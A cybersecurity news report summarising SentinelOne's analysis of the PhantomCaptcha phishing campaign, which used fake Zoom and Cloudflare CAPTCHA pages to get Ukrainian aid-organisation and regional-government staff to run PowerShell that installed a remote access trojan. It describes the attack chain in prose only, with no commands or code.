Cybersecurity researchers at SentinelOne have released details of a coordinated phishing attack dubbed PhantomCaptcha, targeting aid organizations in Ukraine, as well as state administrations in four regions, with the aim of deploying a remote access Trojan.
Cybersecurity researchers at SentinelOne have released details of a coordinated phishing attack dubbed PhantomCaptcha, targeting aid organizations in Ukraine, as well as state administrations in four regions, with the aim of deploying a remote access Trojan.
According to a new report from SentinelOne , on October 8, 2025, individual members of the International Red Cross, the Norwegian Refugee Council, the UNICEF Ukraine office, the Council of Europe Damage Register, as well as regional administrations of Ukraine in Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv regions were targeted in an attack, The Hacker News reports .
Victims were sent phishing emails that mimicked the Office of the President of Ukraine. The email contained a PDF document with an embedded link. Clicking on the link directed the victim to a fake Zoom website (“zoomconference[.]app”).
At this point, a fake Cloudflare CAPTCHA page in the ClickFix style was triggered. Under the guise of a browser check, it tricked the victim into executing a malicious PowerShell command by pasting it into the Windows Run dialog.
The fake Cloudflare page also created a WebSocket connection to the attackers' server. Although the researchers did not observe this attack line being activated, they suspect it is intended for live social engineering sessions.
The PowerShell command triggers an encrypted bootloader whose primary function is to retrieve and execute a second-stage payload from a remote server. This second-stage malware conducts reconnaissance on the compromised host and sends data to the same server, which in turn sends a PowerShell remote access trojan.
“The final payload is a WebSocket-based remote access trojan hosted on Russian infrastructure that allows for arbitrary remote command execution, data theft, and potential deployment of additional malware,” security researcher Tom Hegel said. “This WebSocket-based RAT is a remote command execution backdoor, essentially a remote shell that gives the operator arbitrary access to the host (computer).”
A closer analysis of the downloads on VirusTotal showed that this 8-page malicious PDF file was downloaded from various countries — Ukraine, India, Italy, and Slovakia — likely indicating a wide geographic reach of targets.
SentinelOne noted that preparations for the campaign began on March 27, 2025, which may indicate complex planning.
The campaign has not been officially attributed to any known attacker or group, although the use of the ClickFix method coincides with recently exposed attacks by the Russian-linked COLDRIVER hacking group.
“The PhantomCaptcha campaign reflects a highly skilled adversary that demonstrates extensive operational planning, a distributed infrastructure, and deliberate control of visibility,” SentinelOne said. “The six-month period between the initial registration of the infrastructure and the execution of the attack, followed by the rapid takedown of user-facing domains while maintaining a ‘command and control’ backend, highlights that the operator is well-versed in both offensive techniques and methods of evading defensive detection.”
